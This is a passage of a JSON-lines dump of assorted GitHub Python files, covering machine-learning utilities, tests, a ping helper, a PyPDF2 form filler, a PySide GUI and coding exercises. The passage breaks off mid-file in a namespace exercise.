+{"seq_id":"24565059127","text":"train_config = \"exp/tts_train_raw_phn_g2pk/config.yaml\"\nmodel_file = \"exp/tts_train_raw_phn_g2pk/284epoch.pth\"\nvoc_config_file = \"voc_exp/hifigan_v2/config_v2.json\"\nvoc_checkpoint_file = \"voc_exp/hifigan_v2/g_00900000\"\ntoken_list = \"token_list/phn_g2pk/tokens.txt\"\n\nfrom espnet2.sato.demo import TextToSpeech\ntts = TextToSpeech(train_config, model_file, voc_config_file, voc_checkpoint_file, token_list)\nalpha = 1.0\nf0_shift = None\ntts(\"문학작품 낭송 음성데이터는 자연스럽게 문학작품을 낭송하는 인공지능 기술 개발을 위한 음성 데이터입니다.\", speed_control_alpha=alpha, f0_shift=f0_shift)\n","repo_name":"imdanboy/tts_hackaton_2021","sub_path":"egs2/sato/tts1/demo_tts.py","file_name":"demo_tts.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39785496071","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Global variables\nimg_path = '/home/user/class/mc906/p4/dataset/data/image/origin'\n\nannotation_file = '/home/user/class/mc906/p4/dataset/data/label/label.lst'\n\nf = open(os.path.join(annotation_file), \"r\")\nlabels = f.readlines()\n\nemotion_dict = {}\nfor line in labels:\n split = line.split(' ', 1)\n emotion_dict[split[0]] = split[1]\n\nfor original in os.listdir(img_path):\n if original.endswith(\".jpg\"):\n # Read image\n image = cv2.imread(os.path.join(img_path, original))\n \n # Find label for image\n if original in emotion_dict:\n # Read face coordinates\n top_x, top_y, bot_y, bot_x = emotion_dict[name].split(' ')[1:5]\n \n top_x = int(top_x)\n top_y = int(top_y)\n bot_y = int(bot_y)\n bot_x = int(bot_x)\n\n # Crop face\n crop = image[top_x:bot_x, top_y:bot_y]\n\n # Save cropped face\n name = 'fcrop_'+original\n cv2.imwrite(name, crop)\n","repo_name":"rlamarques/face-emotion-detection","sub_path":"face-crop.py","file_name":"face-crop.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4314806463","text":"import os\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transform\nimport numpy as np\n\nclass CarvanaDataset(Dataset):\n\n def __init__(self, image_dir, mask_dir):\n self.image_dir = image_dir\n self.mask_dir = mask_dir\n self.transform = transform.Compose([transform.ToTensor(),\n transform.Resize((160, 240))])\n\n self.images = os.listdir(image_dir) # image_dir 경로에 있는 모든 file의 이름을 가져온다. (path X file name O)\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.image_dir, self.images[idx]) # Rename as \"path + file name\" !\n mask_path = os.path.join(self.mask_dir, self.images[idx].replace(\".jpg\", \"_mask.gif\")) # Rename as \"path + file name\" !\n '''\n _mask.gif 확장자 -> jpg로 바꾸기 , path + filename 결합하기 동시에 수행 \n '''\n # RGB Image로 열어서 numpy type으로 type casting\n image = np.array(Image.open(img_path).convert(\"RGB\")) # 확실히 하기 위해 RGB Image로 열도록 명시\n mask = np.array(Image.open(mask_path).convert(\"L\"), dtype=np.float32) # L : gray Scale\n\n image = self.transform(image)\n mask = self.transform(mask)\n\n # 0.0 ~ 255.0\n mask[mask == 255.0] = 1.0 # Sigmoid 를 마지막 Activation function으로 사용할 것이기 때문에 1의 값으로 맞추어주자.\n\n return image, mask\n\n\n","repo_name":"dldnxks12/A.I","sub_path":"Deep Learning/7. 
Segmentation-Semantic/U-Net/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42980177660","text":"import math\nfrom functools import reduce\nfrom unittest import TestCase, skip\n\nfrom torch.utils.data import DataLoader\n\nfrom models.LaplacianFrequencyRepresentation import LaplacianFrequencyRepresentation\nfrom models.ASDN import ASDN\n\nimport torch\nimport torch.nn as nn\n\nfrom tests.pytorch_test import PyTorchTest\nfrom tests.util_for_testing import RandomTensorDataset\n\n\n@skip(\"Done and it's working. Skipped because it's expensive.\")\nclass TestASDN(PyTorchTest):\n def before(self):\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(\"Current device: \", self.device)\n\n # batch size 8 use 5.5GB\n self.loader = DataLoader(RandomTensorDataset(), batch_size=8)\n self.asdn = ASDN(3, lfr=LaplacianFrequencyRepresentation(1, 2, 11)).to(self.device)\n\n def after(self):\n self.device = None\n self.loader = None\n self.asdn = None\n\n def test_forward(self):\n scale = 1.3674\n\n leveliminus1, leveli = self.lfr.get_for(scale=scale)\n\n start = torch.cuda.Event(enable_timing=True)\n end = torch.cuda.Event(enable_timing=True)\n\n self.asdn.train()\n\n for index, batch in enumerate(self.loader):\n batch = batch.to(self.device)\n\n start.record()\n outputi = self.asdn(batch, irb_index=leveli.index)\n end.record()\n\n torch.cuda.synchronize()\n print(\"=\" * 3, index, \"=\" * 3)\n print(f\"Time passed (s): {start.elapsed_time(end) / 1000:.2f}\")\n\n print(outputi.size())\n\n\nclass TestASDN(TestCase):\n\n def test_test_step(self):\n def compute_last_patch_size(scale, patch_size):\n scales = lfr.get_scales(scale)\n scales = [lfr.get_for(scale)[-1].scale for scale in scales]\n last_patch_size = patch_size\n for scale in scales:\n last_patch_size = last_patch_size * scale\n return math.floor(last_patch_size)\n\n lfr = LaplacianFrequencyRepresentation(1, 2, 11)\n model = ASDN(3, lfr).cuda()\n\n patch = torch.rand(8, 3, 48, 48).cuda()\n print(patch.size())\n print(\"x2\", patch.size(-1) * 2)\n print(\"x3.5\", patch.size(-1) * 3.5)\n\n scale = 2\n out = model.test_step(scale, patch)\n self.assertEqual(out.size(-1), compute_last_patch_size(scale, patch.size(-1)))\n\n scale = 3.5\n out = model.test_step(scale, patch)\n self.assertEqual(out.size(-1), compute_last_patch_size(scale, patch.size(-1)))\n","repo_name":"alessandrodicosola/SuperSampling","sub_path":"tests/test_ASDN.py","file_name":"test_ASDN.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"34993672573","text":"import pandas as pd\nimport os\nimport json\nimport logging\nimport sys\nlogging.basicConfig(filename = 'logs.log')\n\n#This function will create customer_level_features.csv\ndef customer_level_features(read_from_train, read_from_test, write_to):\n customer_level_features = ['customer_number',\n 'avg_of_all_delays',\n 'avg_of_invoices_closed',\n 'payment_count_quarter_q1',\n 'payment_count_quarter_q2',\n 'payment_count_quarter_q3',\n 'payment_count_quarter_q4',\n 'invoice_count_quarter_q1',\n 'invoice_count_quarter_q2',\n 'invoice_count_quarter_q3',\n 'invoice_count_quarter_q4',\n 'L1_perc',\n 'L2_perc',\n 'L3_perc',\n 'M_perc',\n 'H_perc'\n ]\n\n data = pd.read_csv(r''+read_from_train)\n data2 = pd.read_csv(r''+read_from_test)\n\n 
customer_level_dataset=pd.DataFrame()\n dataset = data[customer_level_features].append(data2[customer_level_features], ignore_index=True)\n for i in dataset['customer_number'].unique():\n customer_level_dataset = customer_level_dataset.append(dataset[dataset['customer_number'] == i][customer_level_features].iloc[0], ignore_index=True)\n\n customer_level_dataset.rename(columns={'customer_number':'object_value','H_perc':'H','L1_perc':'L1','L2_perc':'L2','L3_perc':'L3','M_perc':'M'},inplace=True)\n if customer_level_dataset['object_value'].dtype==float:\n customer_level_dataset['object_value'] = customer_level_dataset['object_value'].astype('int')\n customer_level_dataset.to_csv(write_to,index=False)\n logging.warning('Customer Level Features Created.')\n\n\ndef subsets_json(subset):\n list=[]\n for invoice_number in subset['invoice_number']:\n invoice=subset[subset['invoice_number']==invoice_number]\n list.append({\"invoice_amount\":invoice['invoice_amount'].values[0],\"invoice_number\":str(invoice_number).split('.')[0],\"invoice_date\":invoice['invoice_date'].values[0]})\n return list\n\n\ndef raw_json_creation(read_from, read_from_subsets,write_to):\n\n data = pd.read_csv(r''+read_from) # raw csv\n subsets_predictions = pd.read_csv(read_from_subsets) # predictions\n\n temp = data.groupby('payment_id').agg({'customer_number':'nunique'}).reset_index()\n invalid_payments = temp[temp['customer_number'] > 1]['payment_id'].unique()\n print(invalid_payments)\n data = data[~data['payment_id'].isin(invalid_payments)]\n\n top_header = data.groupby('payment_id')[['customer_number','unique_invoice_count','payment_amount','payment_date']].max().reset_index()\n payments = []\n predictions = pd.DataFrame()\n\n for index, row in top_header.iterrows():\n if row['payment_id'] not in subsets_predictions['payment_id'].unique():\n print('payment' + str(row['payment_id']) + 'not found')\n continue\n\n subset_dict = {}\n subset_dict[\"customer_number\"] = str(row['customer_number'])\n subset_dict[\"unique_invoice_count\"] = row['unique_invoice_count']\n subset_dict[\"payment_amount\"] = row['payment_amount']\n subset_dict[\"primaryKey\"]=int(row['payment_id'])\n subset_dict[\"payment_date\"]=str(row['payment_date'])\n subset_dict[\"items\"] = []\n items = []\n subsets = data[data['payment_id']==row['payment_id']]\n for subset_number in subsets['subset_number'].unique():\n abc = len(subsets_predictions[(subsets_predictions['payment_id']==row['payment_id']) & (subsets_predictions['subset_number']==subset_number)])\n if abc == 0:\n # print('subset ' + str(subset_number) + ' not found for payment ' + str(row['payment_id']))\n continue\n items.append({\"subsetId\":int(subset_number),\"subset\":subsets_json(subsets[subsets['subset_number']==subset_number])})\n predictions=predictions.append(subsets_predictions[(subsets_predictions['payment_id']==row['payment_id']) & (subsets_predictions['subset_number']==subset_number)],ignore_index=True)\n subset_dict['items']=items\n payments.append(subset_dict)\n final_json={\"data\":payments}\n write_to_ = write_to+'raw_data_json.json'\n with open(write_to_, 'w') as fp:\n json.dump(final_json, fp)\n predictions.rename(columns={'output':'actual','predictions':'output','H_perc':'H','L1_perc':'L1','L2_perc':'L2','L3_perc':'L3','M_perc':'M','pred_proba_0':'probability(0)','pred_proba_1':'probability(1)'},inplace=True)\n predictions.to_csv(write_to+'raw_predictions.csv',index=False)\n\n\n#This function will divide the data to 70% train and 30% test\ndef rivana_testing(read_from, 
testing_data_path, write_to_raw_csv):\n raw_fields = ['customer_number','payment_id','payment_amount','payment_date','invoice_number','invoice_amount','invoice_date','subset_number','unique_invoice_count','output']\n raw_csv = pd.DataFrame()\n testing_data = pd.read_csv(testing_data_path)\n testing_payment_ids = testing_data['payment_id'].unique()\n for i in os.listdir(read_from):\n dataset = pd.read_csv(r''+read_from+'/' + str(i), sep=',', index_col=0)\n dataset['invoice_number']=dataset['invoice']\n dataset['invoice_amount']=dataset['amount']\n dataset=dataset[dataset['payment_id'].isin(testing_payment_ids)]\n raw_csv=raw_csv.append(dataset[raw_fields],ignore_index=True)\n raw_csv.to_csv(write_to_raw_csv)\n\n\nif __name__ == '__main__':\n acct_id = str(sys.argv[1])\n #path = \"/root/accounts\"\n path = str(sys.argv[2])\n read_from = path+'/account_'+acct_id+'/customer_subsets_features'\n testing_data_path = path+\"/account_\"+acct_id+\"/train_test_splitted/test_30.csv\"\n write_to_raw_csv = path+\"/account_\"+acct_id+\"/rivana_test/raw_data.csv\"\n\n \n # This function will generate all the Rivana Testing Files\n rivana_testing(read_from, testing_data_path, write_to_raw_csv)\n\n read_from = write_to_raw_csv\n write_to = path+\"/account_\"+acct_id+\"/rivana_test/\"\n read_from_subsets = path+\"/account_\"+acct_id+\"/predictions/predictions.csv\"\n # This function will create JSON input files\n raw_json_creation(read_from, read_from_subsets, write_to)\n\n # This will generate aggregate file of customer level features\n read_from_train = path+\"/account_\"+acct_id+\"/train_test_splitted/train_70.csv\"\n read_from_test = path+\"/account_\"+acct_id+\"/train_test_splitted/test_30.csv\"\n write_to = path+'/account_'+acct_id+'/rivana_test/customer_level_features.csv'\n\n #This will generate aggregate file of customer level features\n customer_level_features(read_from_train, read_from_test,write_to)\n","repo_name":"rohansasmal123/continuous-testing","sub_path":"generate_Test_Files.py","file_name":"generate_Test_Files.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26279433784","text":"import ping3\r\nimport sys\r\n\r\ndef ping_server(ip_address):\r\n try:\r\n response_time = ping3.ping(ip_address)\r\n if response_time is not None:\r\n print(f\"Ping to {ip_address} successful. Response time: {response_time:.2f} ms\")\r\n else:\r\n print(f\"Ping to {ip_address} failed.\")\r\n except PermissionError:\r\n print(\"Ping failed. Please run the script as a superuser (root/Administrator).\")\r\n except ValueError as ve:\r\n print(f\"Error: {ve}\")\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 2:\r\n print(\"Usage: python ping_server.py \")\r\n sys.exit(1)\r\n\r\n ip_address = sys.argv[1]\r\n ping_server(ip_address)\r\n","repo_name":"hvamruth/Myrepo","sub_path":"Code/python/ping_server.py","file_name":"ping_server.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"677116681","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'arrayManipulation' function below.\n# https://www.hackerrank.com/challenges/crush/problem\n#\n# The function is expected to return a LONG_INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER n\n# 2. 
2D_INTEGER_ARRAY queries\n#\n\ndef arrayManipulation(n, queries):\n \n arr = [0] * n\n for q in queries :\n arr[q[0]-1] += q[2]\n if (q[1] < n) :\n arr[q[1]] -= q[2]\n\n max_val = arr[0]\n counter_val = 0\n for val in arr :\n counter_val += val\n if max_val < counter_val :\n max_val = counter_val\n return max_val\n\nif __name__ == '__main__':\n #fptr = open('OUTPUT/OUT', 'w')\n frptr = open('OUTPUT/IN', 'r')\n fptr = open('OUTPUT/OUT', 'w')\n\n first_multiple_input = frptr.readline().rstrip().split()\n\n n = int(first_multiple_input[0])\n\n m = int(first_multiple_input[1])\n\n queries = []\n\n for _ in range(m):\n queries.append(list(map(int, frptr.readline().rstrip().split())))\n\n result = arrayManipulation(n, queries)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"yuvSid/interviewPrepare","sub_path":"python/array_manipulation.py","file_name":"array_manipulation.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"69820315921","text":"import sys\n\nfrom PyQt6.QtWidgets import QStatusBar\nfrom PySide6.QtCore import QSize\nfrom PySide6 import QtWidgets, QtCore, QtGui\nfrom PySide6.QtGui import QAction\nfrom PySide6.QtWidgets import QApplication, QMessageBox, QApplication, QMainWindow, QPushButton, QLabel, QToolBar\nfrom PySide6.QtCore import Qt\nimport qtawesome as qta\n\nwindow_title = \"Screen shot snipping tool\" # Window title\n\nwindow_width = 500 # Window width\nwindow_height = 350 # Window height\nwindow_size = QSize(window_width, window_height) # Window size\n\n\n# Subclass QMainWindow to customize your application's main window\nclass SnippingWidgetTool(QMainWindow):\n def __init__(self):\n super().__init__() # Call the inherited classes __init__ method\n self.setWindowTitle(window_title) # Set the window's title\n self.setFixedSize(window_size) # Set the window's size\n self.counter = 0\n\n # Initialize elements\n self.toolbar = QToolBar(\"My toolbar\")\n self.text = QLabel(\"This is a text\", self)\n\n # Call functions\n self.information_text() # Call the information text method\n self.snippet_button() # Call the screenshot button method\n\n def snippet_button(self):\n # Screenshot button\n self.button = QPushButton(\"Snip Tool\", self) # Create a button in the window || Initialize the button\n # -- Clickable actions --\n self.button.clicked.connect(self.the_button_was_clicked) # Connect the button to the function\n # --- Reizing the button ---\n # Center the button position at the top of the window relative to the window size\n self.button.move(int((window_width / 2) - window_width / 2),\n int((window_height / 2) - window_height / 2)+180) # Set the button's position\n self.button.resize(window_width, 50) # Set the button's size\n\n def increase_counter(self):\n self.counter += 1\n print(f' Counter is now: {self.counter}')\n\n def the_button_was_clicked(self):\n self.increase_counter()\n self.button.setText(f\"You have clicked on me {self.counter}\") # Change the button's text\n self.text.setText(f\"You have clicked on me {self.counter}\") # Change the button's text\n self.setWindowTitle(f\"Clicked {self.counter} times\") # Change the window's title\n\n def information_text(self):\n self.text.setAlignment(Qt.AlignmentFlag.AlignHCenter | Qt\n .AlignmentFlag.AlignVCenter)\n self.setCentralWidget(self.text)\n\n\n\n\n\n\ndef main():\n app = QApplication(sys.argv) # Create an instance of QApplication\n window = SnippingWidgetTool() # Instantiate your custom 
class\n window.show() # IMPORTANT!!!!! Windows are hidden by default.\n app.exec() # Start the application\n\n\nif __name__ == '__main__': # Run the application\n main() # Run the main function\n","repo_name":"JacobPhillipsDK/OCR-text-recognition","sub_path":"source/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71875662162","text":"'''\n PROBLEM:\n\n \"The town of Tola has population of 40,000 and produces\n 13 tons of garbage each week. Express this information in terms of\n the function f and explain the meaning of f(5) = 2\"\n\n\n\n\n\n\n\n\n\n\n SOLUTION:\n\n\n\n'''\n\n# We can go ahead and do the same basic setup and solve it by getting\n# the slope and use population as x-axis and garbage as y-axis where\n# our two datapoints would be (0,0) and (40,13)\n# ^^ 0,0 because when population is 0 garbage/weeks would obviously be 0\n\n# But I'm going to solve it another way by creating a function f where\n# G = f(P) ( garbage = value of function f when population is it's parameter )\n\n# The reason I'm solving it this way is because I want to show you all the different\n# ways you can solve these problems. If you don't get this solution, it's fine.\n\nimport matplotlib.pyplot as plt\n\ndef f(population):\n garbage_per_person = 13 / 40 # Calculate the average garbage produced per person\n G = garbage_per_person * population # Calculate the total garbage produced\n return G # G = f(P)\n\n# Generate population values from 0 to 100\npopulation_values = range(0, 101) # xmin-xmax\n\n# Calculate garbage production for each population value\ngarbage_values = [f(population) for population in population_values]\n\n# Basic configurations\nplt.title(\"Garbage Production in Tola\")\nplt.xlabel(\"Population\")\nplt.ylabel(\"Garbage (tons)\")\nplt.grid(True)\nplt.axis([0,100, 0,50]) # feel free to change this\n\n# Plot the data\nplt.plot(population_values, garbage_values)\n\nplt.show()\n\n# We were also asked to explain the meaning of \"f(5) = 2\" which basically means\n# that if the population is 5000, 2 tons of garbage is produced per week.","repo_name":"Whqat/college-algebra-with-python-fcc","sub_path":"section1/6.word_problems/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36128543385","text":"from typing import Union, List, Tuple\nimport numpy as np\nfrom scipy.stats import norm\nfrom sklearn.preprocessing import MinMaxScaler\nfrom active_learning.base_policy import Inputs, Labels, Indices, Probs\nfrom active_learning.stopping_strategy import StoppingStrategy\n\n\nclass KneeStopping(StoppingStrategy):\n def __init__(self, *args, window=3, flats=10, rho=\"dynamic\", **kwargs):\n super().__init__(*args, **kwargs)\n self.window = window\n self.flats = flats\n self.rho: Union[str, float] = rho\n self.knee_data: List[Tuple[int, int]] = []\n\n def __str__(self):\n return \"Knee\"\n\n def should_stop(\n self,\n x: Inputs,\n y: Labels,\n train_idxs: Indices,\n val_idxs: Indices,\n scores: Probs,\n i: int,\n ) -> bool:\n if i < self.min_rounds:\n return False\n x_tr, y_tr = x[train_idxs], y[train_idxs]\n current_rels = y_tr.sum()\n n_assessed = len(y_tr)\n self.knee_data.append((n_assessed, current_rels))\n knee_indices = self.__detect_knee()\n if knee_indices:\n knee_index = knee_indices[-1]\n rank1, r1 = self.knee_data[knee_index]\n 
rank2, r2 = self.knee_data[-1]\n try:\n current_rho = float(r1 / rank1) / float((r2 - r1 + 1) / (rank2 - rank1))\n except ZeroDivisionError:\n current_rho = 0\n\n rho = 156 - min(current_rels, 150) if self.rho == \"dynamic\" else self.rho\n return self._check_rho(current_rho, rho, len(y), current_rels, n_assessed)\n return False\n\n def _check_rho(self, current_rho, rho, num_docs, current_rels, n_assessed):\n return current_rho > rho and n_assessed > self.min_rounds\n\n def __detect_knee(self) -> List[int]:\n \"\"\"\n Implementation of the Knee method. Copied and adapted from\n https://github.com/dli1/auto-stop-tar/blob/master/autostop/tar_model/knee.py\n\n Detect the so-called knee in the data.\n The implementation is based on paper [1] and code here (https://github.com/jagandecapri/kneedle).\n\n Uses:\n self._knee_window: The data is smoothed using Gaussian kernel average smoother, this parameter is the window\n used for averaging (higher values mean more smoothing, try 3 to begin with).\n self._knee_flats: How many \"flat\" points to require before we consider it a knee.\n\n Alessio: I don't think in Cormack's paper the window size is explicitly mentioned.\n \"\"\"\n\n knee_indices = []\n data_size = len(self.knee_data)\n data = np.array(self.knee_data)\n\n if data_size == 1:\n return knee_indices\n\n # smooth\n smoothed_data = []\n for i in range(data_size):\n if 0 < i - self.window:\n start_index = i - self.window\n else:\n start_index = 0\n if i + self.window > data_size - 1:\n end_index = data_size - 1\n else:\n end_index = i + self.window\n\n sum_x_weight = 0\n sum_y_weight = 0\n sum_index_weight = 0\n for j in range(start_index, end_index):\n index_weight = norm.pdf(abs(j - i) / self.window, 0, 1)\n sum_index_weight += index_weight\n sum_x_weight += index_weight * data[j][0]\n sum_y_weight += index_weight * data[j][1]\n\n smoothed_x = sum_x_weight / sum_index_weight\n smoothed_y = sum_y_weight / sum_index_weight\n\n smoothed_data.append((smoothed_x, smoothed_y))\n\n smoothed_data = np.array(smoothed_data)\n\n # normalize\n normalized_data = MinMaxScaler().fit_transform(smoothed_data)\n\n # difference\n differed_data = [(x, y - x) for x, y in normalized_data]\n\n # find indices for local maximums\n candidate_indices = []\n for i in range(1, data_size - 1):\n if (differed_data[i - 1][1] < differed_data[i][1]) and (differed_data[i][1] > differed_data[i + 1][1]):\n candidate_indices.append(i)\n\n # threshold\n step = self.flats * (normalized_data[-1][0] - data[0][0]) / (data_size - 1)\n\n # knees\n for i in range(len(candidate_indices)):\n candidate_index = candidate_indices[i]\n\n if i + 1 < len(candidate_indices): # not last second\n end_index = candidate_indices[i + 1]\n else:\n end_index = data_size\n\n threshold = differed_data[candidate_index][1] - step\n\n for j in range(candidate_index, end_index):\n if differed_data[j][1] < threshold:\n knee_indices.append(candidate_index)\n break\n return knee_indices\n","repo_name":"levnikmyskin/salt","sub_path":"baselines/cormack_knee/knee_stopping.py","file_name":"knee_stopping.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12604364103","text":"\"\"\"\nTest the bulk email opt out view.\n\"\"\"\n\nimport ddt\nimport pytest\nfrom django.http import Http404\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\nfrom django.urls import reverse\n\nfrom common.djangoapps.student.tests.factories 
import UserFactory\nfrom lms.djangoapps.bulk_email.models import Optout\nfrom lms.djangoapps.bulk_email.views import opt_out_email_updates\nfrom lms.djangoapps.discussion.notification_prefs.views import UsernameCipher\nfrom openedx.core.lib.tests import attr\nfrom xmodule.modulestore.tests.django_utils import ModuleStoreTestCase # lint-amnesty, pylint: disable=wrong-import-order\nfrom xmodule.modulestore.tests.factories import CourseFactory # lint-amnesty, pylint: disable=wrong-import-order\n\n\n@attr(shard=1)\n@ddt.ddt\n@override_settings(SECRET_KEY=\"test secret key\")\nclass OptOutEmailUpdatesViewTest(ModuleStoreTestCase):\n \"\"\"\n Check the opt out email functionality.\n \"\"\"\n def setUp(self):\n super().setUp()\n self.user = UserFactory.create(username=\"testuser1\", email='test@example.com')\n self.course = CourseFactory.create(run='testcourse1', display_name='Test Course Title')\n self.token = UsernameCipher.encrypt('testuser1')\n self.request_factory = RequestFactory()\n self.url = reverse('bulk_email_opt_out', args=[self.token, str(self.course.id)])\n\n # Ensure we start with no opt-out records\n assert Optout.objects.count() == 0\n\n def test_opt_out_email_confirm(self):\n \"\"\"\n Ensure that the default GET view asks for confirmation.\n \"\"\"\n response = self.client.get(self.url)\n self.assertContains(response, \"confirm unsubscribe from\")\n assert Optout.objects.count() == 0\n\n def test_opt_out_email_unsubscribe(self):\n \"\"\"\n Ensure that the POSTing \"confirm\" creates the opt-out record.\n \"\"\"\n response = self.client.post(self.url, {'unsubscribe': True})\n self.assertContains(response, \"You have successfully unsubscribed from\")\n assert Optout.objects.count() == 1\n\n def test_opt_out_email_cancel(self):\n \"\"\"\n Ensure that the POSTing \"cancel\" does not create the opt-out record\n \"\"\"\n response = self.client.post(self.url)\n self.assertContains(response, \"You have not been unsubscribed from\")\n assert Optout.objects.count() == 0\n\n @ddt.data(\n (\"ZOMG INVALID BASE64 CHARS!!!\", \"base64url\", False),\n (\"Non-ASCII\\xff\".encode(), \"base64url\", False),\n (\"D6L8Q01ztywqnr3coMOlq0C3DG05686lXX_1ArEd0ok\", \"base64url\", False),\n (\"AAAAAAAAAAA=\", \"initialization_vector\", False),\n (\"nMXVK7PdSlKPOovci-M7iqS09Ux8VoCNDJixLBmj\", \"aes\", False),\n (\"AAAAAAAAAAAAAAAAAAAAAMoazRI7ePLjEWXN1N7keLw=\", \"padding\", False),\n (\"AAAAAAAAAAAAAAAAAAAAACpyUxTGIrUjnpuUsNi7mAY=\", \"username\", False),\n (\"_KHGdCAUIToc4iaRGy7K57mNZiiXxO61qfKT08ExlY8=\", \"course\", 'course-v1:testcourse'),\n )\n @ddt.unpack\n def test_unsubscribe_invalid_token(self, token, message, course):\n \"\"\"\n Make sure that view returns 404 in case token is not valid\n \"\"\"\n request = self.request_factory.get(\"dummy\")\n with pytest.raises(Http404) as err:\n opt_out_email_updates(request, token, course)\n assert message in err\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/bulk_email/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"37400792246","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\r\nfrom PyPDF2.generic import BooleanObject, NameObject, IndirectObject\r\n\r\nfrom notificationPopup import show_error_popup\r\n\r\n\r\ndef __set_need_appearances_writer(writer):\r\n\t\"\"\"Fixes glitches in backend of pdf writer, see: 
https://github.com/mstamy2/PyPDF2/issues/355#issuecomment-360575792\"\"\"\r\n\ttry:\r\n\t\tcatalog = writer._root_object\r\n\t\t# get the AcroForm tree and add \"/NeedAppearances attribute\r\n\t\tif \"/AcroForm\" not in catalog:\r\n\t\t\twriter._root_object.update({\r\n\t\t\t\tNameObject(\"/AcroForm\"): IndirectObject(len(writer._objects), 0, writer)})\r\n\r\n\t\tneed_appearances = NameObject(\"/NeedAppearances\")\r\n\t\twriter._root_object[\"/AcroForm\"][need_appearances] = BooleanObject(True)\r\n\t\treturn writer\r\n\r\n\texcept Exception as e:\r\n\t\tshow_error_popup(\"Error: __set_need_appearances_writer() catch : \" + repr(e)) # pipe it to the main out.\r\n\t\treturn writer\r\n\r\n\r\ndef __verify_pdf_acro_reader(pdf):\r\n\tif \"/AcroForm\" in pdf.trailer[\"/Root\"]:\r\n\t\tpdf.trailer[\"/Root\"][\"/AcroForm\"].update({NameObject(\"/NeedAppearances\"): BooleanObject(True)})\r\n\r\n\r\ndef __verify_pdf_acro_writer(pdf):\r\n\tif \"/AcroForm\" in pdf._root_object:\r\n\t\tpdf._root_object[\"/AcroForm\"].update({NameObject(\"/NeedAppearances\"): BooleanObject(True)})\r\n\r\n\r\ndef write_pdf_from_template(pdf_template_path: str, pdf_write_path: str, variable_dictionary: dict):\r\n\t\"\"\"\r\n\tWrites a pdf with the fields supplied, so as to match the template whose path is supplied. Reads and writes all in one.\r\n\t:param pdf_template_path: template path (in our case, safety_checklist.pdf)\r\n\t:param pdf_write_path: output file path (user selected)\r\n\t:param variable_dictionary: form data which is used as a key-value set for the open PDF fields\r\n\t\"\"\"\r\n\tpdf_template = PdfFileReader(open(pdf_template_path, \"rb\"), strict=False)\r\n\t__verify_pdf_acro_reader(pdf_template)\r\n\r\n\tpdf_writer = PdfFileWriter()\r\n\t__set_need_appearances_writer(pdf_writer)\r\n\t__verify_pdf_acro_writer(pdf_writer)\r\n\r\n\tfor page_num in range(pdf_template.numPages):\r\n\t\tpdf_writer.addPage(pdf_template.getPage(page_num))\r\n\r\n\tfor page_num in range(pdf_template.numPages):\r\n\t\tpdf_writer.updatePageFormFieldValues(pdf_writer.getPage(page_num), variable_dictionary)\r\n\r\n\twith open(pdf_write_path, 'wb') as f:\r\n\t\tpdf_writer.write(f)\r\n","repo_name":"bcstpu/Safety-Checklist-App","sub_path":"pdfWriter.py","file_name":"pdfWriter.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11394579801","text":"n = int(input())\n\nvalues_list, results = [], []\n\nstack = {\n 'global': {\n 'variable': [],\n 'parent': None\n }\n}\n\n\ndef add(namesp: str, var: str):\n\n \"\"\"\n Adds elements into known namespaces and all variables into values_list\n :param namesp:\n :param var:\n :return:\n \"\"\"\n\n global stack\n stack[namesp]['variable'].append(var)\n values_list.append(var)\n\n\ndef create(namesp: str, parent: str):\n\n \"\"\"\n Creates a new namespace\n :param namesp:\n :param parent:\n :return:\n \"\"\"\n\n global stack\n if namesp not in stack:\n stack[namesp] = {\n 'variable': [],\n 'parent': parent\n }\n\n\ndef get_var(namesp: str, var: str):\n\n \"\"\"\n Returns the namespace of the incoming var, or None if the namespace/var doesn't exist\n :param namesp:\n :param var:\n :return:\n \"\"\"\n\n global stack\n if var not in values_list or namesp not in stack:\n return None\n else:\n return namesp if var in stack[namesp]['variable'] \\\n else get_var(stack[namesp]['parent'], var)\n\n\nfor i in range(n):\n command, namesp, var_par = input().split()\n if command == 